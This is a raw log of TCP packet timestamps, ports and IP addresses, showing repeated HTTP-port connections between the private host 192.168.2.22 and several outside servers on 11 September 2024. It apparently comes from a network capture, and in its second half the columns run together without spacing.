Sep 11, 2024 10:09:12.202375889 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202394009 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202430010 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202435970 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202465057 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202485085 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202485085 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202498913 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202510118 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202532053 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202558041 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202565908 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202580929 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202599049 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202631950 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202644110 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202644110 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202666998 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202681065 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202702999 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202718973 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202737093 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202759981 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202770948 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202795982 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202819109 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202825069 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202876091 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202883959 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202928066 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202934980 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.202977896 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.202989101 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203012943 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203037024 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203044891 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203066111 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203078985 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203102112 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203114033 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203120947 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203147888 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203171015 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203181982 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203202009 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203216076 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203234911 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203244925 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203274965 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203295946 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203295946 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203350067 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203355074 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203416109 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203439951 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203461885 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203471899 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203495979 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203521967 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203528881 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203541040 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203562021 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203588009 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203596115 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203615904 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203629971 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203645945 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203665018 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203692913 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203699112 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203715086 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203732014 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203753948 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203764915 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203793049 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203798056 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203814983 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203833103 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203866005 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203880072 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203880072 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203897953 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203917027 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203948975 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.203958035 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.203984022 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204010010 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204018116 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204030037 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204051971 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204076052 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204085112 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204102039 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204118967 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204145908 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204164028 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204171896 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204205036 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204230070 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204240084 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204258919 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204272985 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204298973 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204307079 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204328060 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204340935 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204368114 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204375982 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204385996 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204408884 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204431057 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204442024 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204451084 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204473972 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204497099 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204508066 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204518080 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204543114 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204565048 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204576969 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204593897 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204608917 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204632998 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204662085 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204684973 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204695940 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204715014 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204729080 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204742908 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204780102 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204788923 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204814911 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204839945 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204859018 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204868078 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204904079 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204925060 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204937935 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.204950094 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.204991102 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205007076 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205024004 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205040932 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205059052 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205080986 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205091000 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205104113 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205126047 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205141068 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205159903 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205184937 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205193043 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205204010 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205228090 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205249071 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205281973 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205284119 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205315113 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205338955 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205358028 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205368996 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205423117 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205425978 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205456018 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205480099 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205488920 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205497980 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205523014 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205542088 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205557108 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205583096 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205590010 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205604076 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205624104 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205640078 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205657959 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205679893 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205691099 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205699921 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205724001 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205741882 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205756903 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205784082 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205790997 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205804110 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205825090 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205843925 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205858946 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205884933 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205889940 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205904007 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205924034 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205940008 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205957890 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.205976963 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.205990076 CEST  80  49162  45.33.6.223  192.168.2.22
Sep 11, 2024 10:09:12.206002951 CEST  49162  80  192.168.2.22  45.33.6.223
Sep 11, 2024 10:09:12.206022978 CEST  80  49162  45.33.6.223  192.168.2.22
                                        Sep 11, 2024 10:09:12.206041098 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.206058025 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.206064939 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.206090927 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.206108093 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.206125021 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.206134081 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.206176996 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288064003 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288130999 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288167953 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288199902 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288225889 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288225889 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288225889 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288235903 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288273096 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.288291931 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288291931 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.288321018 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:18.856736898 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:18.861690998 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:18.861783981 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:18.870980024 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:18.877033949 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:18.877124071 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:18.878094912 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:18.881942034 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:19.490782976 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:19.490808010 CEST804916389.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:19.490989923 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:20.371918917 CEST4916380192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:21.388427019 CEST4916480192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:21.394404888 CEST804916489.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:21.394511938 CEST4916480192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:21.403691053 CEST4916480192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:21.409526110 CEST804916489.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:22.048521042 CEST804916489.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:22.048558950 CEST804916489.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:22.048727989 CEST4916480192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:22.914628029 CEST4916480192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:23.930932999 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:23.936249971 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:23.936331987 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:23.945384026 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:23.950778961 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:23.950862885 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:23.950921059 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:23.957036972 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:23.957079887 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:24.583694935 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:24.583743095 CEST804916589.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:24.583815098 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:25.457628012 CEST4916580192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:26.473825932 CEST4916680192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:26.479347944 CEST804916689.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:26.479454041 CEST4916680192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:26.490036964 CEST4916680192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:26.495321989 CEST804916689.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:27.126241922 CEST804916689.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:27.129457951 CEST804916689.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:27.129558086 CEST4916680192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:27.130810976 CEST4916680192.168.2.2289.58.49.1
                                        Sep 11, 2024 10:09:27.135942936 CEST804916689.58.49.1192.168.2.22
                                        Sep 11, 2024 10:09:49.687297106 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:49.692533016 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:49.692661047 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:49.702229023 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:49.707473993 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:49.707551956 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:49.707585096 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:49.712591887 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:50.583977938 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:50.584023952 CEST8049167154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:50.584321976 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:51.213154078 CEST4916780192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:52.234853029 CEST4916880192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:52.240094900 CEST8049168154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:52.240192890 CEST4916880192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:52.249310970 CEST4916880192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:52.254440069 CEST8049168154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:53.155361891 CEST8049168154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:53.155450106 CEST8049168154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:53.155596018 CEST4916880192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:53.756020069 CEST4916880192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:54.888680935 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:54.894279957 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:54.894365072 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:54.904728889 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:54.910228968 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:54.910303116 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:54.910315037 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:54.915256977 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:54.915865898 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:55.779352903 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:55.779429913 CEST8049169154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:55.779675007 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:56.407970905 CEST4916980192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:57.424447060 CEST4917080192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:57.429510117 CEST8049170154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:57.429589033 CEST4917080192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:57.435573101 CEST4917080192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:57.440488100 CEST8049170154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:58.324760914 CEST8049170154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:58.324817896 CEST8049170154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:09:58.325131893 CEST4917080192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:58.327552080 CEST4917080192.168.2.22154.23.184.240
                                        Sep 11, 2024 10:09:58.332568884 CEST8049170154.23.184.240192.168.2.22
                                        Sep 11, 2024 10:10:03.357789040 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:03.363142967 CEST804917185.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:03.363190889 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:03.372596979 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:03.377542019 CEST804917185.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:03.377585888 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:03.377680063 CEST804917185.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:03.382509947 CEST804917185.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:04.878902912 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:04.884486914 CEST804917185.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:04.886689901 CEST4917180192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:05.896667957 CEST4917280192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:05.901670933 CEST804917285.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:05.901743889 CEST4917280192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:05.924834013 CEST4917280192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:05.930882931 CEST804917285.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:07.445606947 CEST4917280192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:07.451755047 CEST804917285.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:07.451884031 CEST4917280192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:08.460798025 CEST4917380192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:08.465775967 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:08.468502045 CEST4917380192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:08.475744009 CEST4917380192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:08.480634928 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:08.480815887 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:08.480945110 CEST4917380192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:08.485743046 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:08.485876083 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:09.979981899 CEST4917380192.168.2.2285.159.66.93
                                        Sep 11, 2024 10:10:09.985270023 CEST804917385.159.66.93192.168.2.22
                                        Sep 11, 2024 10:10:09.985388994 CEST4917380192.168.2.2285.159.66.93
